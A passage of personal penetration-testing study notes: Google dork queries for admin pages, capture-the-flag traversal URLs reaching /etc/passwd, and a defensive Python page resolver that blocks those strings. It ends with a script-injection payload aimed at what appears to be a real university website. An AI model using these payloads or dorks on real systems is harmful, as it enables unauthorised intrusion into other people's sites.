CEH2
www.website.com/robots.txt
3) Google dork searches
site:website.com login (you can change the keyword to admin, administrator or something similar)
site:website.com inurl:login (same applies here)
site:website.com intitle:"admin login" (same applies here with the keywords)
e.g. edu inurl:login
4) Using Yashar Shahinzadeh's admin page finder
http://y-shahinzadeh.ir/af
5) Using the Havij Tool
SARANG's ECSA:
1) Explore the source code for file and directory paths, comments, etc.
2) Use robots.txt to discover directories and listings.
https://www.owasp.org/index.php/Testing_for_Cross_site_scripting
audit discovery 4:
http://www.enigmagroup.org/missions/basics/auditing/4/?page=../../../../../../../../../../google.com
(LFI works but RFI does not)
http://www.enigmagroup.org/missions/basics/auditing/4/?page=../../../../../../../../../../http://google.com
audit discovery 5:
http://www.enigmagroup.org/missions/basics/auditing/5/?file=config.php
audit discovery 6: see command injection in the URL
realistic 1:
nmap reveals it is Linux-based, running an Apache server on port 8080.
hence:
http://www.enigmagroup.org/missions/realistics/1/?page=../../../../../../../../../../../../../../../etc/passwd
buffer overflow to reveal passwd file.
http://www.enigmagroup.org:1337/ as nmap reports port 1337 as the "waste" service; it may be customized for login, so exploit it.
use John the Ripper to reveal the passwords.
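Added example (not part of these notes or of the enigmagroup missions): the auditing 4 and realistic 1 notes above both hinge on a ?page= parameter that is passed to a file include without checks. The code below is the defender's side of that: a Python page resolver, with a hypothetical allowlist and a temporary templates directory constructed inline, that refuses the traversal and remote-include strings from the notes while still serving a legitimate page. The function names, the allowlist and the sample pages are assumptions for illustration.

```python
import os
import tempfile
from urllib.parse import urlsplit

# Constructed sandbox: a "templates" directory with two pages, created in a
# temporary folder so the example runs offline and never touches a real site.
TEMPLATE_DIR = tempfile.mkdtemp(prefix="pages_")
for _name in ("home.php", "about.php"):
    with open(os.path.join(TEMPLATE_DIR, _name), "w", encoding="utf-8") as _fh:
        _fh.write(f"<h1>{_name}</h1>\n")

# Hypothetical allowlist of page names the ?page= parameter may select.
ALLOWED_PAGES = {"home", "about"}


def resolve_page(page: str, base_dir: str = TEMPLATE_DIR):
    """Map a ?page= value to a file path, or return None if it must be refused.

    Three independent checks; any one of them alone defeats the traversal and
    remote-include strings seen in the notes above:
      1. reject anything that looks like a URL (RFI attempt),
      2. require the value to be on an explicit allowlist of page names,
      3. confirm the resolved real path is still inside base_dir.
    """
    if not page or "://" in page or urlsplit(page).scheme:  # "http://..." include
        return None
    if page not in ALLOWED_PAGES:  # "../../etc/passwd" and any other free-form value
        return None
    candidate = os.path.realpath(os.path.join(base_dir, page + ".php"))
    root = os.path.realpath(base_dir)
    if os.path.commonpath([root, candidate]) != root:  # defence in depth
        return None
    return candidate if os.path.isfile(candidate) else None


def render(page: str) -> str:
    """Read the resolved template, or return a generic error (never echo the path)."""
    path = resolve_page(page)
    if path is None:
        return "404 Not Found"
    with open(path, encoding="utf-8") as fh:
        return fh.read()


def classify(page: str) -> str:
    """Label a ?page= value the way a log or WAF rule might: rfi, lfi, ok or unknown."""
    if "://" in page or urlsplit(page).scheme:
        return "rfi"
    if ".." in page.split("/") or page.startswith("/"):
        return "lfi"
    return "ok" if page in ALLOWED_PAGES else "unknown"


if __name__ == "__main__":
    for value in ("home", "../../../../../../../../../../google.com",
                  "../../../../../../../../../../http://google.com",
                  "../../../../../../../../../../../../../../../etc/passwd"):
        print(f"{classify(value):8} {value!r:60} -> {render(value)[:20]!r}")
```

The allowlist is the check that actually matters; the URL-scheme test and the realpath containment test are there so that a later change (say, someone replacing the allowlist with a regex) does not silently reopen the hole. Returning a generic 404 instead of the attempted path also keeps the error page from confirming the directory layout to whoever is probing it.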
DOM (Document Object Model) based XSS vulnerability: use an online DOM XSS scanner tool.
XSS vulnerability example:
Instead of
http://scmhrd.edu/eventgallery.php?eventyear=2013&eventname=Prayatna
write this:
http://scmhrd.edu/eventgallery.php?eventyear=2013&eventname=<script>alert("Hello")</script>